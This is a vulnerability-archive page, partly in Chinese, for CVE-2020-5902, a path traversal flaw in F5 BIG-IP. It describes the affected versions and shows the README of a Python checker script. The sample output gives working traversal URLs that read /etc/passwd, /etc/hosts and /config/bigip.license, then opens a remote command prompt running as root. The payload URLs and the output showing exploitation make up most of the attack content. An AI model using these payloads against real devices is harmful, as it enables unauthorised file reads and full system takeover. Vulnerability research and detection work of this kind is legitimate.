Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2020-5902 PoC — F5 BIG-IP 路径遍历漏洞

Source
Associated Vulnerability
Title:F5 BIG-IP 路径遍历漏洞 (CVE-2020-5902)
Description:F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 F5 BIG-IP中存在路径遍历漏洞。攻击者可利用该漏洞执行任意的系统命令、创建或删除文件,关闭服务/执行任意的Java代码,可能完全入侵系统。以下产品及版本受到影响:F5 BIG-IP 15.1.0版本,15.0.0版本,14.1.0版本至14.1.2版本,13.1.0版本至13.1.3版本,12.1.0版本至12.1.5版本,11.6.1版本至11.6.5版本。
Description
Python script to check CVE-2020-5902 (F5 BIG-IP devices).
Readme
# CVE-2020-5902
Python script to check CVE-2020-5902 (F5 BIG-IP devices).

# Usage
```
python3 CVE-2020-5902.py -i <IP>
```
# Output
```
- Python script to check CVE-2020-5902 (F5 BIG-IP devices). | coded by Abdullah AlZahrani
[!] Your target: 127.0.0.1
[I] /etc/passwd readable
[PoC] https://127.0.0.1/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

[I] /etc/hosts readable
[PoC] https://127.0.0.1/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts

[I] /config/bigip.license readable
[PoC] https://127.0.0.1/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license

[I] The target is vulnerable to CVE-2020-5902
[*] Check if the target vulnerable to RCE
[#] The target is vulnerable to RCE, let's GO.
Command > id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
```

File Snapshot

[4.0K] /data/pocs/abb7180263a303696e7c3349b7f45c4663ed05ba ├── [4.3K] CVE-2020-5902.py └── [ 880] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.